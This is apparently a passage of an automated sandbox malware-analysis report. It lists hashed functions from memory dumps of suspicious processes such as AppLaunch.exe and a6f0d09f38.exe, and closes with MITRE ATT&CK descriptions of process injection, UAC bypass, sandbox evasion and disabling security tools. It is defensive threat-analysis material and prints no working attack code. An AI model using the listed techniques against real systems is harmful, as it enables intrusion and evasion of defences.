Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c10000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1a22cc360f002039a4fdf9c9f21ab958bd84596ac8092679871bc3069a784a3
Instruction ID: e0f75b81821ce416dd6907e0b453966342a38f1e010d30939b62c8871a8ee800
Opcode Fuzzy Hash: f1a22cc360f002039a4fdf9c9f21ab958bd84596ac8092679871bc3069a784a3
Instruction Fuzzy Hash: C8B092A3C842604FCF0226A08C5DA886F21D4523A278F10C2E000D7641D8508C82EAA2

Non-executed Functions

Function 061E7689 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f25ca6cdfb16b57197d9848c61e1d238e1909bcf37530d64ee51a34b3ea0555
Instruction ID: 9aa6d8c5d134606146b1411b0f9629246269388932da696a6d2606898c070c0d
Opcode Fuzzy Hash: 2f25ca6cdfb16b57197d9848c61e1d238e1909bcf37530d64ee51a34b3ea0555
Instruction Fuzzy Hash: C4915B70E55208CFEB94EFA8D494BADB7F2FB89304F509169D409AB394DB309985CF80

Function 061E7698 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca24fe2b5e027b46aad5b2dc6c1acb0e88f18da2b8f1fa09fd81e8888211a9ac
Instruction ID: 79f54760f8653e0f13999d9fdbc4a4c0e75727104dd36dbae531203f73bb8116
Opcode Fuzzy Hash: ca24fe2b5e027b46aad5b2dc6c1acb0e88f18da2b8f1fa09fd81e8888211a9ac
Instruction Fuzzy Hash: EA913A70E55208CFEB94EFA8D494BADB7F2FB89304F509569D009AB394DB309985CF40

Function 061E77B4 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a59134d1959ade0c5005b4db49161fae6b4e7e680ddbb674e1cab6e1cfff7ac7
Instruction ID: 512be977bfc26715176fb3e54ccd1093b009d50e72eb0083d848bb59d9ad4342
Opcode Fuzzy Hash: a59134d1959ade0c5005b4db49161fae6b4e7e680ddbb674e1cab6e1cfff7ac7
Instruction Fuzzy Hash: 07912670E55208CFEB94EFA8D494BADBBF2FB89304F509569D009AB394DB309985CF40

Function 061E160A Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277f727dfe15e541a5410221d719c87c754b05dd63e574b42a6f896239286842
Instruction ID: 7ef36e00e36f5737f21483414423fd9a820889501d26a61980515177b9e9c583
Opcode Fuzzy Hash: 277f727dfe15e541a5410221d719c87c754b05dd63e574b42a6f896239286842
Instruction Fuzzy Hash: 675168B4D01608EFEB84DFA8D455BEDBBF2FB49705F14942AD405AB244DB74894ACF80

Function 061E1618 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2452070894.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61e0000_SxQyhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 502ebd83b2cde7667f9acaa5b5a4394a33b85a3818ac0452f4123384ae0aaf60
Instruction ID: 25127bfde3080b4826e303f198898214ed2a2399a616e10f311dd08374f1beb6
Opcode Fuzzy Hash: 502ebd83b2cde7667f9acaa5b5a4394a33b85a3818ac0452f4123384ae0aaf60
Instruction Fuzzy Hash: 96515574D05608EFEB44DFA8D495BEDBBF2FB4A701F05902AD405AB244CB74894ACF80

Analysis Process: AppLaunch.exePID: 2720, Parent PID: 2580COMMON

Executed Functions

Function 06E210C7 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06E211D8
Te^q, xrefs: 06E21115

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: e56d5b71b28830ae14ab78fd7cc746f323f4646e608cbb3e93b185b8fa1c5af2
Instruction ID: 182e264dfb35a95fe48ff14e50f08b8fcd6b4ec4b6c060a76995d9f76dfe3ab7
Opcode Fuzzy Hash: e56d5b71b28830ae14ab78fd7cc746f323f4646e608cbb3e93b185b8fa1c5af2
Instruction Fuzzy Hash: 5C411B74A10219DFCB44DF68D598AAD7BF6AF4D300F2154A8E506EB361CE749D44CF50

Function 06E21570 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

Deq, xrefs: 06E2160F

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: e8bffe2d0d492ed93a82c1f503f035384e83c301608d09fc91d80e975a81b875
Instruction ID: 259fa7778480d1e8ddd40bb75daca10fedb3c9c853290055e9131e25ad61fa61
Opcode Fuzzy Hash: e8bffe2d0d492ed93a82c1f503f035384e83c301608d09fc91d80e975a81b875
Instruction Fuzzy Hash: F5617A74A006158FCB58DF29D584999BBF6FF88310B1985A9E406EB361DB30ED41CB90

Function 06E20AFF Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

MZ+, xrefs: 06E20A35

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID: MZ+
API String ID: 0-3439302414
Opcode ID: 1939eb3d182b807dccc8f4d0592f6abb81fa75778769eb17fdad1995deb5fc34
Instruction ID: 0b83720bb36d2bb2c4e7ad645b6c429f54878a2315d3610270d5615bda5a05a0
Opcode Fuzzy Hash: 1939eb3d182b807dccc8f4d0592f6abb81fa75778769eb17fdad1995deb5fc34
Instruction Fuzzy Hash: 22112EB0909366CFE795CF168445BE17BE3BF99340F5AA4F6C04A8B2A6D7315401CF91

Function 06E20A7F Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

MZ+, xrefs: 06E20A35

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID: MZ+
API String ID: 0-3439302414
Opcode ID: 7bd4c6ab981322716d006fe80552e752372547fc1471163bb469a7b113d5a632
Instruction ID: fb6aa7d07ca65c0834d814c0d4aad307657f0293d137001bbf82bb48e04c85fb
Opcode Fuzzy Hash: 7bd4c6ab981322716d006fe80552e752372547fc1471163bb469a7b113d5a632
Instruction Fuzzy Hash: C0F0A9B0808766CEE785CF158408BE1B7F6BFA8300F9AA0B581478B3A2D3345402CB81

Function 06E208A8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b565cb716733d70674a3ddd69a88a852cc097836d36f080624defa05cf9e7a
Instruction ID: 1704fb080af2d45b5ebdfea075c2a999317b589f80ab76d079052d9fbcb91212
Opcode Fuzzy Hash: d1b565cb716733d70674a3ddd69a88a852cc097836d36f080624defa05cf9e7a
Instruction Fuzzy Hash: E321A235744655DFE344DF68D849A6ABBE6FF89310B1540A9F506CB361DA31EC01C7A0

Function 0561D1D8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2957287984.000000000561D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0561D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_561d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7861a5b17b785fff0891429d646b5dc8f295ad853295d904b5e943f8af6ce63a
Instruction ID: c14a9ddf759577a7557c94d0813ce3006fd550783620932aa44d1c9e4fa19c9a
Opcode Fuzzy Hash: 7861a5b17b785fff0891429d646b5dc8f295ad853295d904b5e943f8af6ce63a
Instruction Fuzzy Hash: F821DE71504240DFCB15DF54D984B3ABBB6FB88314F28C269EE094E256C336D456CAA1

Function 0561D4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2957287984.000000000561D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0561D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_561d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e428872520de74edec46d318818b49881d0950021b003f8213fc8d731cec79e
Instruction ID: 833a24ada1b0462a3c0d404efe403dc06b94118344a64392713a2f30f549431b
Opcode Fuzzy Hash: 9e428872520de74edec46d318818b49881d0950021b003f8213fc8d731cec79e
Instruction Fuzzy Hash: 6921F171504200EFDB05DF14D9C0B36BF76FB88318F28C269ED0A0A256C336D456CAA6

Function 0561D1D3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2957287984.000000000561D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0561D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_561d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
Instruction ID: 9ed9210fd4e4e2e3b28fa8951b16fdc5640ffd9cdfc97726f6f70147d20c4046
Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
Instruction Fuzzy Hash: E3218C76504240DFCB16CF54D984B26BF72FB84314F28C2AADD090A656C33AD41ACBA1

Function 0561D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2957287984.000000000561D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0561D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_561d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 06499ceb2acbb191fcc951a9fffa2e3506195128ee13ac4698d0596a16d96eba
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 7F11B176504240DFDB16CF14D5C4B26BF72FB84324F28C6A9DD090B656C336D45ACBA2

Function 06E24830 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafbaeeab43a1c703c0085339fdd364cd02d2901d17bb9c0833262383bb8bbb6
Instruction ID: bca0ace52e0942b885b682484bfb8d53d11b72f72a040713d678d3332bc32529
Opcode Fuzzy Hash: aafbaeeab43a1c703c0085339fdd364cd02d2901d17bb9c0833262383bb8bbb6
Instruction Fuzzy Hash: 29118270D15399DFE744DFA8D4483ADBBF2EF44304F5094A9E41997284DBB44980CB81

Function 06E20899 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c153dbd266ded4562884de4f77af28a933fc9cd5b8753b1a7c8166afdddbd3ff
Instruction ID: 8821eefb7d309c391fbec87961950850aebba58821ba765c28697ae708b6556b
Opcode Fuzzy Hash: c153dbd266ded4562884de4f77af28a933fc9cd5b8753b1a7c8166afdddbd3ff
Instruction Fuzzy Hash: C6F02432308219DFE3888669E445BE6BBD6F7CA351B185469E107CB380DD22D801C3E0

Function 06E21040 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138720542e9d029cfb45c805f03127befda75ad1283c3956864773cc92de26a4
Instruction ID: 77bd27ec7e9784ffea8349c91a7da3a6993be7df43b29a8342021a4468ce2986
Opcode Fuzzy Hash: 138720542e9d029cfb45c805f03127befda75ad1283c3956864773cc92de26a4
Instruction Fuzzy Hash: 7BF065362141548FC345DF78E155A557FF5BF8D61131641D6E00ACB7A3CE25CC45CB52

Function 06E21091 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32eb62c3ea1ce5349d3e7521eda95144523dc40b9f1809f40162869f7cd7c16f
Instruction ID: 3b629cddec2141d1730247feebe771e4c45fe834ab15b019617d5d768c7cedba
Opcode Fuzzy Hash: 32eb62c3ea1ce5349d3e7521eda95144523dc40b9f1809f40162869f7cd7c16f
Instruction Fuzzy Hash: 7DE08C3570C7948FCB026B78E818A48BFB59FCB15230900E2F445CB7A3DE249C11CB95

Function 06E210A0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e52c59811aca2b16b34f5ba68297222f3519b346f689205009dc54abdc70522c
Instruction ID: 149d814be7442a95d1b2c4453bafad69884085dafcbc5d0c5fe63960f42203a2
Opcode Fuzzy Hash: e52c59811aca2b16b34f5ba68297222f3519b346f689205009dc54abdc70522c
Instruction Fuzzy Hash: BAD0C9357146188FCF10ABB9E40D85D7BE9AFC966630110A5F90AC73A0EF359C018B95

Function 06E225AC Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdeec84d3d4d2c0087e6da9cfe6138c9711ffabb024f686830d65bf27ba1e602
Instruction ID: 62aed527fbfe4e9b82559dde6460f453fbe3e4b6d8d8587027d061560675f0cb
Opcode Fuzzy Hash: bdeec84d3d4d2c0087e6da9cfe6138c9711ffabb024f686830d65bf27ba1e602
Instruction Fuzzy Hash: 8CC01230B10928EFDF142AA0EC688FCBA72EB49202F409428FA13BA250CA2148049B24

Function 06E26557 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3780bad4027e91547f2a78062309a4bba1836d1640e1217ad7bfb0dc29f7e6
Instruction ID: 8d53635b81b316e32ef068fd2d7ba9715e7988cbfb4d9e02201d266589987b2e
Opcode Fuzzy Hash: 3d3780bad4027e91547f2a78062309a4bba1836d1640e1217ad7bfb0dc29f7e6
Instruction Fuzzy Hash: 49C04C74B10729CFEF545B74901D25979E1EB85705F10646DB44AC3280DD3449808A53

Function 06E2C3F0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87a46693efa5091366106c8200b798a168e58b3b6504b4330a3669b0d6bd293c
Instruction ID: 38e613190c10e3f6b1bb467b6e4256870cd1999770f5218585a0dafd01f3dff5
Opcode Fuzzy Hash: 87a46693efa5091366106c8200b798a168e58b3b6504b4330a3669b0d6bd293c
Instruction Fuzzy Hash: 0AA0223008AF0CC38A8032B0A800A2833CC08800083C000B8820C0AA200833F0A08080

Function 06E20881 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2961237041.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e20000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af85dfa47d38a0b1b2843e97f1a4d6f87650b0abf1574e73c91e16e306f01f1e
Instruction ID: 39caded2e68cd7ef7056619ea775b9b32e01ef66b713d9eef70f1005633427ba
Opcode Fuzzy Hash: af85dfa47d38a0b1b2843e97f1a4d6f87650b0abf1574e73c91e16e306f01f1e
Instruction Fuzzy Hash: C9B0923206D4C58ECF10CB34F5C77883F60BBC2202F282469A05082260DE289005CB10

Analysis Process: a6f0d09f38.exePID: 7620, Parent PID: 2312COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	2

Executed Functions

Function 063DE886 Relevance: 1.3, APIs: 1, Instructions: 81
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000), ref: 063DF3F9

Memory Dump Source

Source File: 0000000D.00000002.2987765650.00000000063DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: true

Associated: 0000000D.00000002.2987242012.00000000063D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987567847.00000000063D6000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987765650.000000000655D000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987765650.000000000666A000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987765650.0000000006678000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987765650.000000000667A000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_63d0000_a6f0d09f38.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: af1743da405fb1f4c2fd3efc2973fe3e7db54877c9999b571e1ad8cf80b03fb6
Instruction ID: 21d8b28bcd61173eaed5966928681467329cf9db337b04f2281413a85de81948
Opcode Fuzzy Hash: af1743da405fb1f4c2fd3efc2973fe3e7db54877c9999b571e1ad8cf80b03fb6
Instruction Fuzzy Hash: 632180B210C709DFE7856F54E8846BEBBE8FF45300F12092DE5C686640D7750C50CB96

Function 063DE710 Relevance: 1.3, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000), ref: 063DE739

Memory Dump Source

Source File: 0000000D.00000002.2987765650.00000000063DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: true

Associated: 0000000D.00000002.2987242012.00000000063D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987567847.00000000063D6000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987765650.000000000655D000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987765650.000000000666A000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987765650.0000000006678000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.2987765650.000000000667A000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_63d0000_a6f0d09f38.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 25b45255dbc6b6c1674a6fafe9a1456ae02531ee36b92caef350bece74561a8c
Instruction ID: 447f945fb514867d109aa8ed50e6ea468237c093e1513fdc1278b0a799cc3a62
Opcode Fuzzy Hash: 25b45255dbc6b6c1674a6fafe9a1456ae02531ee36b92caef350bece74561a8c
Instruction Fuzzy Hash: 29E01AB1508708DBDB406F39D50C29EBBF0EF90731F10860DE9A58A590C3724C90DB0A

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
